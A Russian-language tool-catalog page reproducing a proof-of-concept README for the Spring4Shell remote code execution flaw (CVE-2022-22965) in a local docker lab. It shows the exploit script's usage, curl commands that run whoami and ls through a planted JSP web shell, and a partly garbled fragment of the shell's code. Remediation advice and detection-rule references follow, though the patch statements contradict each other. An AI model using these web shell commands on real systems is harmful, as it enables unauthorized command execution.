Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SpringShell — Spring4Shell — удалённое выполнение кода в Spring Core — CVE-2022-22965 | Kitploit
Инструменты/GitHubGitHub/thegejr/springshell
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubthegejr/springshell

SpringShell

Spring4Shell — удалённое выполнение кода в Spring Core — CVE-2022-22965

Репозиторий
13182134 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Spring Core RCE - CVE-2022-22965

Вслед за Spring Cloud, 29 марта, в Интернете разразилась ещё одна крупная уязвимость Spring: Spring Core RCE

31 марта Spring выпустил новые версии, которые исправляют уязвимость. См. раздел Исправление.

31 марта уязвимости наконец был присвоен номер CVE с оценкой CVSS 9.8 (КРИТИЧЕСКИЙ)

Доказательство концепции

Эксплойт очень прост в использовании, поэтому уязвимость получила столь высокую оценку CVSS 9.8.

Чтобы проверить уязвимость, вы можете сделать следующее.

Запустите уязвимый docker-образ Spring.

docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

Это привязывает уязвимый Spring к адресу localhost:8082.

Проверьте, что образ запущен корректно, с помощью curl

curl http://localhost:8082

Должен быть возвращён ответ ok.

Теперь эксплуатируем уязвимый образ!

python3 exp.py --url http://localhost:8082

Должен быть возвращён ответ The vulnerability exists .....

Теперь вы можете эксплуатировать уязвимость с помощью curl

# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

Распространяемый PoC-код

На данный момент эксплойт загружен: exp.py
Распространяемый PoC-код
Неловкая ситуация

Исправление

Spring теперь выпустил новые версии, которые устраняют данную уязвимость CVE. См. объявление Spring.

Коммит, исправивший уязвимость

Воздействие уязвимости

  1. JDK версии 9 и выше
  2. Используется Spring Framework или производные фреймворки

Рекомендация по исправлению

На данный момент Spring ещё не выпустил официальный патч, поэтому в качестве временного решения рекомендуется понизить версию jdk.

Синяя команда

Yara

  • Florian Roth — веб-шеллы Spring4Shell

Sigma

  • Emanuele De Lucia — создание .jsp веб-шеллов

SPLUNK

  • Alex John — обнаружение Splunk с помощью SPL
Скачать инструмент